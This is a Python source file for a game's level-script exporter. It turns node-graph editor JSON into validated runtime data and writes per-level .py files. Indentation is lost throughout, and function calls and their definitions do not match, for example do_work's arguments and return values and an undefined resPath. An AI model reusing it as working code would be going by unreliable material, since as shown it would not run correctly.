start = editorEdge["start"]
end = editorEdge["end"]
startItemID = editorEdge["startItemId"]
endItemID = editorEdge['endItemId']
key = (start, end, startItemID, endItemID)
assert key not in edgeSet
edgeSet.add(key)
def generate_node_graph(defData, editorData):
defData = {node['name'][1]: node for node in defData}
nodes = {}
defaultNoneValue = Value()
for editorNode in editorData["nodes"]:
node = Node()
nodes[editorNode['id']] = node
node.nodeType = editorNode['type']
node.nodeID = editorNode['id']
nodeDef = defData[node.nodeType] # {} 一个节点
node.name = nodeDef['name'][0]
node.nodeDef = nodeDef
for returnDef in nodeDef['returns']:
returnType = returnDef['type']
returnName = returnDef['name'][0]
returnUUID = returnDef['name'][1]
if returnType == 'Event':
node.eventLinks[returnUUID] = {
'name': returnName,
'links': []
}
else:
valueRef = Value()
if 'value' in returnDef:
valueRef.value = returnDef['value']
assert validate_type(valueRef.value, returnType)
node.returns[returnUUID] = {
'name': returnName,
'type': returnType,
'valueRef': valueRef,
'linked': False
}
for (order, argDef) in enumerate(nodeDef["args"]):
argType = argDef['type']
argName = argDef["name"][0]
argUUID = argDef["name"][1]
argOrder = order
if argType == 'Event':
node.funcs[argUUID] = argDef.get('action', None) or argDef.get('function')
node.preLinks[argUUID] = {
'name': argName,
'links': []
}
else:
# TODO
node.args[argUUID] = {
'name': argName,
'type': argType,
'valueRef': defaultNoneValue,
'order': argOrder,
'argDef': argDef,
'dataProvider': None,
}
if argUUID in editorNode['args']:
value = Value()
if argType == 'Vec3':
try:
value.value = string_to_vec3(editorNode['args'][argUUID])
except:
raise TypeMismatchError(
'validate_type Vec3 error, argName "%s", type of (%s) is not %s, def is %s' % (
argName, value.value, argType, node.nodeDef), node.nodeID, argUUID)
else:
if editorNode['args'][argUUID] is None:
value = defaultNoneValue
else:
value.value = editorNode['args'][argUUID]
try:
assert validate_type(value.value, argType)
except:
raise TypeMismatchError(
'validate_type error, argName "%s", type of (%s) is not %s, %s, def is %s' % (
argName, value.value, argType, type(value.value), node.nodeDef), node.nodeID,
argUUID)
node.args[argUUID]['valueRef'] = value
node.args[argUUID]['dataProvider'] = node
for editorEdge in editorData["edges"]:
startNode = nodes[editorEdge["start"]]
endNode = nodes[editorEdge["end"]]
if editorEdge['linktype'] == 'Event':
assert editorEdge['endItemId'] in endNode.funcs
startNode.eventLinks[editorEdge["startItemId"]]['links'].append({
'node': endNode,
'eventUUID': editorEdge['endItemId'],
'funcID': endNode.funcs[editorEdge['endItemId']]
})
endNode.preLinks[editorEdge['endItemId']]['links'].append({
'node': startNode,
'eventUUID': editorEdge['startItemId']}
)
else:
# NOTE: 如果一个节点已经手工写了值了,那么不应该再由其他节点提供值
try:
assert endNode.args[editorEdge["endItemId"]]['valueRef'] is defaultNoneValue
except:
print("endNode '%s', attribute '%s', value is '%s', which should be None" % (
endNode.name, endNode.args[editorEdge["endItemId"]]['name'],
endNode.args[editorEdge["endItemId"]]['valueRef'].value))
raise
assert endNode.args[editorEdge["endItemId"]]['dataProvider'] is None
if startNode.nodeDef.get('query', False):
endNode.preQueryNodes.append(startNode)
endNode.args[editorEdge["endItemId"]]['valueRef'] = startNode.returns[editorEdge["startItemId"]]['valueRef']
startNode.returns[editorEdge["startItemId"]]["linked"] = True
endNode.args[editorEdge["endItemId"]]['dataProvider'] = startNode
# NOTE: 允许Any类型节点接受任何输入,允许任何类型接受Any类型的输入,其他情况下保持两侧类型一致
assert endNode.args[editorEdge["endItemId"]]['type'] == startNode.returns[editorEdge["startItemId"]][
'type'] or endNode.args[editorEdge["endItemId"]]['type'] == 'Any' or \
startNode.returns[editorEdge["startItemId"]]['type'] == 'Any'
for node in nodes.values():
for argUUID, arg in node.args.items():
argDef = arg['argDef']
argType = argDef['type']
if argType == 'Event':
continue
argValueRef = arg['valueRef']
argValue = arg['valueRef'].value
if argValue is None:
if argDef.get('valueCanBeNone', False):
pass
else:
try:
assert arg['dataProvider'] is not None
assert arg['dataProvider'] is not node
except:
raise NoneValueError('value error, argName "%s" of node [ %s ] can not be None' % (
argDef['name'][0], node.nodeDef['name'][0]), node.nodeID, argUUID)
else:
try:
assert validate_type(argValue, argType)
except:
raise TypeMismatchError(
'validate_type error, argName "%s", type of (%s) is not %s, %s, def is %s' % (
argDef['name'][0], argValue, argType, type(argValue), node.nodeDef), node.nodeID,
argUUID)
if argDef.get('ensureStaticConst') and argValueRef is not defaultNoneValue:
try:
assert arg['dataProvider'] is node
except:
raise TypeMismatchError(
'validate_type error, value must be static const, argName "%s", type of (%s) is not %s, def is %s' % (
argDef['name'][0], argValue, argType, node.nodeDef), node.nodeID, argUUID)
return nodes
def do_work(defData, editorData, byEditor, filename, is_city=None):
nodeGraph = generate_node_graph(defData, editorData)
# NOTE: 这里做了一些trick,来把string转换成list,避免运行时转换开销
for node in nodeGraph.values():
if node.is_node('Random Select String', 'a6bfe777-df7c-484c-b16d-71259527dca4'):
assert node.nodeDef['function']
assert node.nodeDef['query'] is True
assert num_events_in_args(node.nodeDef) is 0
assert len(node.preQueryNodes) is 0
assert len(node.args) is 1
arg = next(iter(node.args.values()))
assert arg['dataProvider'] is node
value = extract_multiple_string(arg['valueRef'].value)
assert len(value) > 0
for v in value:
if len(v) <= 0 or not isinstance(v, str):
print("Wrong value format in random_select_string", node)
raise EOFError
arg['valueRef'].value = value
elif node.is_node('Play SFX', '79e89d07-876e-4b9e-a00d-c3f1221582b6'):
degreeArg = node.args['34c3310e-4df4-403f-adda-d5786a4345f5']
degreeArgValue = degreeArg['valueRef'].value
if degreeArgValue is not None:
arcArg = node.args['e5785ef1-3c37-402b-883d-20116aaa63c7']
arcArg['valueRef'].value = degreeArgValue / 180.0 * math.pi
elif node.is_node('Set Int Variable', "bf7eab3f-b0b2-426f-9ddc-355c930ec0e6"):
assert len(node.args) is 2
arg = node.args['d4444300-2f7a-4ea2-80a0-40ed7b393d78']
if arg['dataProvider'] is node:
assert type(arg['valueRef'].value) is int
elif node.is_node('Set Variable', '7532929c-3d5e-4264-92cc-7f0b5c7ca0b7'):
assert len(node.args) is 2
arg = node.args['17ddb382-4d7f-47b4-a1f1-929bd74cf91e']
assert arg['dataProvider'] is not node, "use 'Set XXX Variable' instead"
elif node.is_node('Array Data(Int)', 'bf11a6e1-e92d-4cb9-80dd-0e3cd22f164a'):
assert node.nodeDef['function']
assert node.nodeDef['query'] is True
assert num_events_in_args(node.nodeDef) is 0
assert len(node.preQueryNodes) is 0
assert len(node.args) is 1
arg = next(iter(node.args.values()))
assert arg['dataProvider'] is node
value = list(map(int, arg['valueRef'].value.split(',')))
assert len(value) > 0
arg['valueRef'].value = value
elif node.is_node('Array Data(Float)', '800cdc88-c30e-4b7f-8d39-d3f3843e53df'):
assert node.nodeDef['function']
assert node.nodeDef['query'] is True
assert num_events_in_args(node.nodeDef) is 0
assert len(node.preQueryNodes) is 0
assert len(node.args) is 1
arg = next(iter(node.args.values()))
assert arg['dataProvider'] is node
value = list(map(float, arg['valueRef'].value.split(',')))
assert len(value) > 0
arg['valueRef'].value = value
elif node.is_node('Array Data(String)', '400d6243-58e4-43e1-a1fc-34fa41a421ff'):
assert node.nodeDef['function']
assert node.nodeDef['query'] is True
assert num_events_in_args(node.nodeDef) is 0
assert len(node.preQueryNodes) is 0
assert len(node.args) is 1
arg = next(iter(node.args.values()))
assert arg['dataProvider'] is node
value = extract_multiple_string(arg['valueRef'].value)
assert len(value) > 0
for v in value:
if len(v) <= 0 or not isinstance(v, str):
print("Wrong value format in random_select_string", node)
raise Exception
arg['valueRef'].value = value
elif node.is_node('Random Select Float', 'ca345a9f-56d9-4197-b6e3-1dfc65dfae0c'):
assert node.nodeDef['function']
assert node.nodeDef['query'] is True
assert num_events_in_args(node.nodeDef) is 0
assert len(node.preQueryNodes) is 0
assert len(node.args) is 1
arg = next(iter(node.args.values()))
assert arg['dataProvider'] is node
value = list(map(float, arg['valueRef'].value.split(',')))
assert len(value) > 0
arg['valueRef'].value = value
elif node.is_node('Random Select Integer', '4e0fa583-7ba8-40d1-82d2-375d98b95500'):
assert node.nodeDef['function']
assert node.nodeDef['query'] is True
assert num_events_in_args(node.nodeDef) is 0
assert len(node.preQueryNodes) is 0
assert len(node.args) is 1
arg = next(iter(node.args.values()))
assert arg['dataProvider'] is node
value = list(map(int, arg['valueRef'].value.split(',')))
assert len(value) > 0
arg['valueRef'].value = value
elif node.is_node('Open NPC Dialog', 'e0e5d422-f970-429b-8a62-7b5fcae3a5c4'):
arg = node.args.get('d10b29b5-7276-4df1-84ca-7fec5fc44b67', None)
value = arg['valueRef'].value
if value:
talk_list = []
for item in value.split(';'):
talk_item = item.split(',')
assert len(talk_item) == 2
talk_item[1] = int(talk_item[1])
talk_item[0] = str(talk_item[0])
talk_list.append(talk_item)
arg['valueRef'].value = talk_list
elif node.is_node('Open NPC Dialog(Only In Dungeon)', '32cff2f0-7157-4d59-a658-13fdbae44b6d'):
arg = node.args.get('361036ea-5700-4e79-bed8-1c0a84c64f16', None)
value = arg['valueRef'].value
if value:
talk_list = []
for item in value.split(';'):
talk_item = item.split(',')
assert len(talk_item) == 2
talk_item[1] = int(talk_item[1])
talk_item[0] = str(talk_item[0])
talk_list.append(talk_item)
arg['valueRef'].value = talk_list
elif node.is_node('Play Cinematic', '8d21cbcb-287f-48f9-8aa9-71b9293a6348'):
def get_num(reg_str, prefix_len, line):
index = re.search(reg_str, line)
if index:
length = index.group(0)
length = length[prefix_len:-1]
return float(length)
return 0
path_arg = node.args.get('954cde6d-c8cc-4b61-bc48-19e0a0d60987', None)
path = path_arg['valueRef'].value
if path:
anim_file = os.path.join(resPath, path)
if os.path.exists(anim_file):
try:
anim_file_handle = open(anim_file, 'r')
lines = anim_file_handle.readlines()
length = get_num('''length = "[0-9.]*''', len('length = "'), lines[0])
if length:
start_black_time = get_num('''start_black_time = "[0-9.]*''', len('start_black_time = "'),
lines[0])
length += start_black_time
end_black_time = get_num('''end_black_time = "[0-9.]*''', len('end_black_time = "'),
lines[0])
length += end_black_time
path_arg['valueRef'].value = path + ';' + str(length)
else:
print('Error: can not find length in ', anim_file)
traceback
except Exception as e:
print('Error: get anim length failed, ', anim_file, e)
traceback
else:
print('Error: open anim_file failed, ', anim_file)
traceback
player_id_arg = node.args.get('4407dd3a-9af0-46f3-a82d-ca47f5ed9b8a', None)
if not player_id_arg.get('dataProvider') and is_city is True:
raise Exception('Play Cinematic, but Player EntityID == None is forbid in city level!!')
elif node.is_node('Start Unit Dialog Tips', '5c7c06b0-b06c-49b7-afaf-e2473cb12c10'):
player_id_arg = node.args.get('9eef619e-0ffc-488a-89dd-276ba67dcdb5', None)
player_id = player_id_arg['valueRef'].value
if not player_id and is_city is True:
raise Exception('Start Unit Dialog Tips, but Player EntityID == None is forbid in city level!!')
elif node.is_node('Advance Task', '217dd054-8c6e-4976-bf3c-9defbc218c74'):
for_all_players_arg = node.args.get('9ddf1c84-db67-421e-951c-4607821abdd8', None)
for_all_players = for_all_players_arg['valueRef'].value
if for_all_players and is_city is True:
raise Exception('Advance Task, but \'For All Players\' == True is forbid in city level!!')
elif node.is_node('Create Mechanism', 'f0f220b5-e584-4aff-8c86-f039d030c02b'):
arg = node.args.get('b6e0a54f-b5b2-11e5-8bb7-448a5b598860', None)
value = arg['valueRef'].value
if value:
value = value.split(',')
arg['valueRef'].value = value
elif node.is_node('Create Mechanism With Lightmap', '03cfda15-a336-4c6c-b8a4-75123e88628d'):
arg = node.args.get('cf1d99e2-a1b7-48e8-ad79-40014ef128bf', None)
value = arg['valueRef'].value
if value:
value = value.split(',')
arg['valueRef'].value = value
# NOTE: lightmap 信息导出
arg = node.args['6fd92e9d-7e74-414a-a662-c411aee4f19d']
value = arg['valueRef'].value
value = extract_multiple_string(value)
assert len(value) == 2
arg['valueRef'].value = value
elif node.is_node('Set Enable Player Skills', '49c402b3-022a-47e8-8028-1401c78b332c'):
arg = node.args.get('ea57e264-6569-4dba-8b0a-0995f1f0825c') # Skill ID List
value = list(map(int, arg['valueRef'].value.split(',')))
assert len(value) > 0
arg['valueRef'].value = value
nodes = []
idx = 0
for node in nodeGraph.values():
node.idx = idx
nodes.append(None)
idx += 1
runTimeData = []
# 先完成所有节点的转换后再进行遍历
trigger_grids_all = {}
for node in nodeGraph.values():
for retUUID, value in node.returns.items():
valueRef = value['valueRef']
if valueRef.idx is None:
idx = len(runTimeData)
valueRef.idx = idx
runTimeData.append(valueRef.value)
for node in nodeGraph.values():
for argUUID, value in node.args.items():
valueRef = value['valueRef']
if valueRef.idx is None:
idx = len(runTimeData)
valueRef.idx = idx
runTimeData.append(valueRef.value)
for node in nodeGraph.values():
# if len(node.preQueryNodes) > 0:
# preQueryNodes = [(preQueryNode.idx, preQueryNode.nodeDef['function']) for preQueryNode in
# node.preQueryNodes]
# else:
# preQueryNodes = None
"""
# TODO: 缓存优化
args = [ (value['order'], value['valueRef'].idx) for argUUID, value in node.args.iteritems() ]
args.sort(key = lambda x : x[0])
args = tuple([ value[1] for value in args ])
"""
# TODO: Vector
args = {value['name']: value['valueRef'].idx for argUUID, value in node.args.items()}
returns = {value['name']: value['valueRef'].idx for _, value in node.returns.items()}
# returns_linked = False
# for retUUID, value in node.returns.items():
# returns.append((value['name'], value['valueRef'].idx))
# # returns_linked |= value['linked']
# returns = tuple(returns)
# eventLinks = {value['name']: {link['node'].idx: 'In' for link in value['links']} for
# eventUUID, value in node.eventLinks.items()}
eventLinks = {value['name']: [(link['node'].idx, link['funcID']) for link in value['links']] for
eventUUID, value in node.eventLinks.items()}
prelinks = {}
for value in node.preLinks.values():
# if value['links']:
prelinks[value['name']] = [node.funcs[key] for key in node.funcs][0]
if byEditor:
nodes[node.idx] = {
# 'preQueryNodes': preQueryNodes,
'eventLinks': eventLinks,
'args': args,
'returns': returns,
'preLinks': prelinks,
'nodeUUidIdx': (node.nodeID, node.idx)
}
else:
nodes[node.idx] = {
# 'preQueryNodes': preQueryNodes,
'event_actions': prelinks,
'event_links': eventLinks,
'inputs': args,
'outputs': returns,
}
# if returns_linked:
# nodes[node.idx]['returns_linked'] = True
"""
针对外部事件的特殊处理
"""
def append_runtime_data(value):
runTimeData.append(value)
return len(runTimeData) - 1
on_script_start = []
on_player_load_scene_finish = []
on_player_unit_dead = []
levelEventListeners = {
'on_script_start': on_script_start,
'on_player_load_scene_finish': on_player_load_scene_finish,
'on_player_unit_dead': on_player_unit_dead
}
clientEventListeners = {}
taskEventListeners = {}
activityStartListeners = {}
levelTimesUseoutEventListeners = {}
openPublicInstnaceEventListeners = {}
# staticMechanisms = []
questionEventListeners = []
STATIC_MECHANISM_PARAMS = {
'Mechanism Config ID': 'mechanism_config_id',
'Block Point': 'block_point',
'Spawn Point': 'spawn_point',
'Tile Index': 'tile_index',
'Unit Type': 'unit_type'
}
autoCreatePlayerUnitNodeCount = 0
setColorThemeNodeCount = 0
BUILTIN_LEVEL_EVENTS = ['on_script_start', 'on_player_load_scene_finish', 'on_player_unit_dead']
AddTaskDetailRequiredNames = {}
CounterNames = {}
mechanism_with_blcok = set()
has_opt_mechanism = set()
for node in nodeGraph.values():
if node.name == 'On Script Start' or node.nodeType == 'f8af0dbe-14b1-415d-bc91-5eb68bd2bd06':
assert node.nodeType == 'f8af0dbe-14b1-415d-bc91-5eb68bd2bd06'
assert node.name == 'On Script Start'
assert node.nodeDef['function']
assert num_events_in_args(node.nodeDef) is 0
on_script_start.append((node.idx, node.nodeDef['function']))
elif node.is_node("Create NPC", "83e7076d-9d00-4415-9e9f-d121c6d0d2e6"):
if node.args['2c5d3d12-509f-45ce-ba8d-b8590c12739c']['dataProvider'] is None: # Position
arg = node.args['7032826b-37c5-4299-a172-2621c92ef289'] # Spawn Point
argValue = arg['valueRef'].value
if argValue is None:
assert arg['dataProvider'] is not node
assert arg['dataProvider'] is not None
elif node.is_node("Create Monster", "b8bdb1c4-48e3-4c7b-b38e-12aef4a29db0"):
if node.args['ad60708a-4917-4fef-a193-9e1d62d2e8bd']['dataProvider'] is None: # Position
arg = node.args['33228f1d-1b7a-405d-82d4-7958acc8e8dc'] # Spawn Point
argValue = arg['valueRef'].value
if argValue is None:
assert arg['dataProvider'] is not node
assert arg['dataProvider'] is not None
elif node.is_node("Create Monster Boss", "f7454550-56f5-4242-86a8-9e46b140feab"):
if node.args['8b062406-a831-4a43-baad-9c7bd65a84ef']['dataProvider'] is None: # Position
arg = node.args['40c74e07-8e28-4366-bd92-25e5d3c97dc7'] # Spawn Point
argValue = arg['valueRef'].value
if argValue is None:
assert arg['dataProvider'] is not node
assert arg['dataProvider'] is not None
elif node.is_node("Create Monster Avatar", "9d1d78e6-0591-4b88-b34f-2a6864252151"):
if node.args['8dc0f1c1-188d-4e41-979f-737bda223697']['dataProvider'] is None: # Position
arg = node.args['2c74e5fd-8695-4bd2-aa71-9a28ff8ad5a6'] # Spawn Point
argValue = arg['valueRef'].value
if argValue is None:
assert arg['dataProvider'] is not node
assert arg['dataProvider'] is not None
elif node.is_node("Create Monster World Boss", "f7454550-56f5-4242-86a8-9e46b141feab"):
if node.args['40c74e07-8e28-4366-bd92-25e5d3c97dc8']['dataProvider'] is None: # Position
arg = node.args['8b062406-a831-4a43-baad-9c7bd65a85ef'] # Spawn Point
argValue = arg['valueRef'].value
if argValue is None:
assert arg['dataProvider'] is not node
assert arg['dataProvider'] is not None
elif node.is_node("Create Mechanism", "f0f220b5-e584-4aff-8c86-f039d030c02b"):
if node.args['cb7c120d-aa4d-4adc-8a09-20ecd5b539c0']['dataProvider'] is None: # Position
arg = node.args['b84f6f5c-695f-4b56-b98b-3bd61698bd3c'] # Spawn Point
argValue = arg['valueRef'].value
if argValue is None:
assert arg['dataProvider'] is not node
assert arg['dataProvider'] is not None
elif node.name == 'On Level Loaded' or node.nodeType == 'e468c7df-0563-4f68-9c8f-daf2e77d08b7':
assert node.name == 'On Level Loaded'
assert node.nodeType == 'e468c7df-0563-4f68-9c8f-daf2e77d08b7'
assert node.nodeDef['function']
assert num_events_in_args(node.nodeDef) is 0
on_player_load_scene_finish.append((node.idx, node.nodeDef['function']))
elif node.is_node('Auto Create Player Unit', '02b886bc-365f-4913-bae0-3dbf270633f3'):
assert autoCreatePlayerUnitNodeCount == 0
assert node.nodeDef['function']
assert num_events_in_args(node.nodeDef) is 0
autoCreatePlayerUnitNodeCount += 1
on_player_load_scene_finish.append((node.idx, node.nodeDef['function']))
elif node.is_node('Add Task Detail', '3d934991-fcfe-44f4-8129-35295f0e4393'):
arg = node.args['8519ec91-87de-48a3-a049-47c107f7ac39']
assert arg['name'] == 'Counter Name'
name = arg['valueRef'].value
assert not name in AddTaskDetailRequiredNames
AddTaskDetailRequiredNames[name] = node
elif node.is_node('Counter', '7035072e-0ca7-4ec4-b36b-0a25123386fe'):
arg = node.args['fbed0f80-12ad-48a2-a3a3-e733ee0b6c01']
assert arg['name'] == 'Name'
name = arg['valueRef'].value
if name is not None:
assert not name in CounterNames
CounterNames[name] = node
elif node.is_node('Create Static Object', '9ed37096-bc78-47c9-b0d0-44fef1f8002d'):
# NOTE: 创建静态机关,先放在这里,之后再调整
on_script_start.append((node.idx, 'create_static_object'))
elif node.is_node('On Player Unit Dead', '95d00220-6cc5-4ecd-bbe7-73bbfbd827a7'):
assert num_events_in_args(node.nodeDef) is 0
on_player_unit_dead.append((node.idx, node.nodeDef['function']))
elif node.name == 'On Level Event' or node.nodeType == '7c2ac230-a0dd-41a7-a3f3-c501cfce7e59':
assert node.name == 'On Level Event'
assert node.nodeType == '7c2ac230-a0dd-41a7-a3f3-c501cfce7e59'
assert len(node.args) == 1
eventName = list(node.args.values())[0]['valueRef'].value
assert list(node.args.values())[0]['dataProvider'] is node
assert eventName not in BUILTIN_LEVEL_EVENTS
if eventName in levelEventListeners:
levelEventListeners[eventName].append((node.idx, node.nodeDef['function']))
else:
levelEventListeners[eventName] = [(node.idx, node.nodeDef['function'])]
elif node.name == 'Response Server Event' or node.nodeType == '0a8f2f1b-1999-411c-b690-662924beef44':
assert node.name == 'Response Server Event'
assert node.nodeType == '0a8f2f1b-1999-411c-b690-662924beef44'
assert len(node.args) == 1
eventName = list(node.args.values())[0]['valueRef'].value
assert list(node.args.values())[0]['dataProvider'] is node
if eventName in clientEventListeners:
clientEventListeners[eventName].append((node.idx, node.nodeDef['function']))
else:
clientEventListeners[eventName] = [(node.idx, node.nodeDef['function'])]
elif node.name == 'Trigger Client Event' or node.nodeType == 'e4a4da2b-d039-4c91-9fc6-4287557cee1f':
assert node.name == 'Trigger Client Event'
assert node.nodeType == 'e4a4da2b-d039-4c91-9fc6-4287557cee1f'
assert len(node.args) == 3
elif node.name == 'On UI Event' or node.nodeType == '2415af72-a28a-4647-a484-51b94f75c89e':
assert node.name == 'On UI Event'
assert node.nodeType == '2415af72-a28a-4647-a484-51b94f75c89e'
assert len(node.args) == 1
eventName = list(node.args.values())[0]['valueRef'].value
assert list(node.args.values())[0]['dataProvider'] is node
assert eventName not in BUILTIN_LEVEL_EVENTS
if eventName in levelEventListeners:
levelEventListeners[eventName].append((node.idx, node.nodeDef['function']))
else:
levelEventListeners[eventName] = [(node.idx, node.nodeDef['function'])]
elif node.name == 'On Task Event' or node.nodeType == '0dafa7b6-28f5-424a-83b3-bc6cc7728016':
assert node.name == 'On Task Event'
assert node.nodeType == '0dafa7b6-28f5-424a-83b3-bc6cc7728016'
assert len(node.args) == 1
eventName = list(node.args.values())[0]['valueRef'].value
assert list(node.args.values())[0]['dataProvider'] is node
assert eventName not in BUILTIN_LEVEL_EVENTS # 从使用上还是有必要
if eventName in taskEventListeners:
taskEventListeners[eventName].append((node.idx, node.nodeDef['function']))
else:
taskEventListeners[eventName] = [(node.idx, node.nodeDef['function'])]
elif node.name == 'On Level Times Useout' or node.nodeType == '1a33c290-d57a-47ab-8551-7702e0c96f8e':
assert node.name == 'On Level Times Useout'
assert node.nodeType == '1a33c290-d57a-47ab-8551-7702e0c96f8e'
assert len(node.args) == 1
levelId = list(node.args.values())[0]['valueRef'].value
assert list(node.args.values())[0]['dataProvider'] is node
assert levelId not in BUILTIN_LEVEL_EVENTS
if levelId in levelTimesUseoutEventListeners:
levelTimesUseoutEventListeners[levelId].append((node.idx, node.nodeDef['function']))
else:
levelTimesUseoutEventListeners[levelId] = [(node.idx, node.nodeDef['function'])]
elif node.name == 'On Open Public Instance' or node.nodeType == 'ea5801b5-68cb-4a85-bb68-36076c00f1ac':
assert node.name == 'On Open Public Instance'
assert node.nodeType == 'ea5801b5-68cb-4a85-bb68-36076c00f1ac'
assert len(node.args) == 1
levelId = list(node.args.values())[0]['valueRef'].value
assert list(node.args.values())[0]['dataProvider'] is node
assert levelId not in BUILTIN_LEVEL_EVENTS
if levelId in openPublicInstnaceEventListeners:
openPublicInstnaceEventListeners[levelId].append((node.idx, node.nodeDef['function']))
else:
openPublicInstnaceEventListeners[levelId] = [(node.idx, node.nodeDef['function'])]
elif node.name == 'On Activity Start' or node.nodeType == 'b7ae0919-bf04-464d-bd9c-5535a8203500':
assert node.name == 'On Activity Start'
assert node.nodeType == 'b7ae0919-bf04-464d-bd9c-5535a8203500'
assert len(node.args) == 1
activityid = list(node.args.values())[0]['valueRef'].value
assert list(node.args.values())[0]['dataProvider'] is node
assert activityid not in BUILTIN_LEVEL_EVENTS
if activityid not in activityStartListeners:
activityStartListeners[activityid] = []
activityStartListeners[activityid].append((node.idx, node.nodeDef['function']))
elif node.name == 'On Question Event' or node.nodeType == '982dd635-edaf-43d1-a302-a8757cab48f2':
assert node.name == 'On Question Event'
assert node.nodeType == '982dd635-edaf-43d1-a302-a8757cab48f2'
questionEventListeners.append((node.idx, node.nodeDef['function']))
elif node.name == 'Trigger Level Event' or node.nodeType == '59e9fcdb-1c18-45d9-896d-b85267809adc':
assert node.name == 'Trigger Level Event'
assert node.nodeType == '59e9fcdb-1c18-45d9-896d-b85267809adc'
assert len(node.args) == 1
assert list(node.args.values())[0]['valueRef'].value not in BUILTIN_LEVEL_EVENTS
elif node.name == 'Opt Mechanism':
assert node.name == 'Opt Mechanism'
if node.args['0d538da7-1471-42c6-ab7b-4035c21ccae3']['valueRef'].value == True:
mechanismNode = node.args['1411ae69-eaba-4afb-8785-1006a7d2e093']['dataProvider']
if mechanismNode:
idx = mechanismNode.idx
has_opt_mechanism.add(idx)
elif node.name == 'Create Mechanism' or node.nodeType == 'f0f220b5-e584-4aff-8c86-f039d030c02b':
assert node.name == 'Create Mechanism'
assert node.nodeType == 'f0f220b5-e584-4aff-8c86-f039d030c02b'
relevantParams = {}
for value in node.args.values():
if value['name'] in STATIC_MECHANISM_PARAMS:
paramName = STATIC_MECHANISM_PARAMS[value['name']]
paramValue = value['valueRef'].value
if paramValue is None:
if value.get('dataProvider'):
strNode = value.get('dataProvider')
if strNode.name == 'String Data':
paramValue = strNode.args['f1c40cbd-73e8-469c-afde-0375398a510c']['valueRef'].value
if paramValue is None:
continue
relevantParams[paramName] = paramValue
# if len(relevantParams) == len(STATIC_MECHANISM_PARAMS):
elif node.name == 'Create Mechanism With Lightmap' or node.nodeType == '03cfda15-a336-4c6c-b8a4-75123e88628d':
assert node.name == 'Create Mechanism With Lightmap'
assert node.nodeType == '03cfda15-a336-4c6c-b8a4-75123e88628d'
relevantParams = {}
for value in node.args.values():
if value['name'] in STATIC_MECHANISM_PARAMS:
paramName = STATIC_MECHANISM_PARAMS[value['name']]
paramValue = value['valueRef'].value
if paramValue is None:
if value.get('dataProvider'):
strNode = value.get('dataProvider')
paramValue = strNode.args['f1c40cbd-73e8-469c-afde-0375398a510c']['valueRef'].value
else:
continue
relevantParams[paramName] = paramValue
if 'mechanism_config_id' in relevantParams and 'unit_type' in relevantParams:
mechanism_config_id = relevantParams.get('mechanism_config_id')
if 'mechanism_config_id' in relevantParams:
mechanism_config_id = relevantParams.get('mechanism_config_id')
elif node.is_node('Set Color Theme', 'a712c423-d24a-4617-a049-00f4f02b9ebb'):
assert setColorThemeNodeCount == 0
assert node.nodeDef['function']
assert num_events_in_args(node.nodeDef) is 0
setColorThemeNodeCount += 1
on_script_start.append((node.idx, node.nodeDef['function']))
# nodes[node.idx]['args'].append( ('_ColorMultipliers', append_runtime_data([ (1.0, 0.0, 0.0), (0.0, 1.0, 0.0) ])) )
for idx in mechanism_with_blcok:
if idx not in has_opt_mechanism:
for node in nodeGraph.values():
if idx == node.idx:
errorNode = node
mechanism_id = errorNode.args
for value in errorNode.args.values():
if value['name'] == 'Mechanism Config ID':
mechanism_id = value['valueRef'].value
print('WARNING:mechanism %d is used without open in leve:%s' % (mechanism_id, str(filename)))
def get_node_arg_index(args, argName):
for name, argIndex in args:
if name == argName:
return argIndex
raise Exception("cannot find argName %s" % argName)
for name, node in AddTaskDetailRequiredNames.items():
assert name in CounterNames
addTaskDetailNode = nodes[node.idx]
counterNode = nodes[CounterNames[name].idx]
if counterNode['preQueryNodes'] is not None:
if addTaskDetailNode['preQueryNodes'] is None:
addTaskDetailNode['preQueryNodes'] = []
addTaskDetailNode['preQueryNodes'].extend(counterNode['preQueryNodes'])
addTaskDetailNode['args'].append(('_CountNeeded', get_node_arg_index(counterNode['args'], 'Count Needed')))
addTaskDetailNode['args'].append(('_Value', get_node_arg_index(counterNode['returns'], 'Value')))
counterNode['eventLinks']['Value Updated'].append((node.idx, 'add_task_detail_counter_updated'))
counterNode['eventLinks']['Count Reached'].append((node.idx, 'add_task_detail_counter_reached'))
ret = {
'nodes': nodes,
'runTimeData': runTimeData,
}
return ret
def single_file_export(defData, editorData, byEditor, filename):
validate_def_data(defData)
validate_editor_data(editorData)
result = do_work(defData, editorData, byEditor, filename)
# result["staticMechanisms"] = singleStaticMechanisms
return result
def multi_file_export_mode():
import sys
import os
nodeDefFilepath = sys.argv[1]
levelScriptsPath = sys.argv[2]
resPath = sys.argv[3]
outputPath = os.path.join(sys.argv[4], 'levelscripts')
# nodeDefFilepath = "F:/H43/design/tools/main/meta/nodes.json"
# levelScriptsPath = "F:/H43/design/tools/csv2py/levelscripts/"
# resPath = 'F:/H43/common/neox/res'
# outputPath = 'F:/ttt'
defData = json.loads(open(nodeDefFilepath, 'r').read())
validate_def_data(defData)
try:
os.makedirs(outputPath)
except OSError:
if not os.path.isdir(outputPath):
raise
f = open(os.path.join(outputPath, '__init__.py'), 'wb')
f.close()
from output.common.city import data as cityData
needCheckLevelName = []
CITY_TYPE_CAMP_BATTLE = 3
for data in cityData.values():
if 'use_level_config' in data and data.get('city_type') != CITY_TYPE_CAMP_BATTLE:
needCheckLevelName.append('level_%d' % data['use_level_config'])
staticMechanisms = {}
staticMechanismsFile = 'static_mechanisms.py'
for filename in os.listdir(levelScriptsPath):
fullpath = os.path.join(levelScriptsPath, filename)
if os.path.isfile(fullpath) and fullpath.endswith('.json'):
outputFilePath = os.path.join(outputPath, os.path.splitext(filename)[0] + '.py')
print('[ActivityScriptExporter]:', fullpath, '-->', outputFilePath, end=' ')
editorFilepath = fullpath
editorData = json.loads(open(editorFilepath, 'r').read())
validate_editor_data(editorData)
if os.path.splitext(filename)[0] in needCheckLevelName:
is_city = True
else:
is_city = False
result, singleStaticMechanisms = do_work(defData, editorData, False, filename.split('.')[0], resPath,
is_city)
staticMechanisms[os.path.splitext(filename)[0]] = singleStaticMechanisms
resultStr = repr(result)
if is_city:
if "drop_gift_for_instance" in resultStr:
raise Exception('Drop Gift For Instance node in city level!!')
if "open_npc_dialog_broadcast_mode" in resultStr:
raise Exception('open_npc_dialog_broadcast_mode node in city level!!')
# if "Wait NPC Submit Event Time" in resultStr:
# raise Exception('use Wait NPC Submit Event Time in city level!!')
f = open(outputFilePath, 'wb')
f.write('data = ')
f.write(resultStr)
# NOTE: 不能转const,因为vector是用tuple存的,转换会导致脚本层对于类型判定错误
f.write('\n_reload_all = True\n')
f.close()
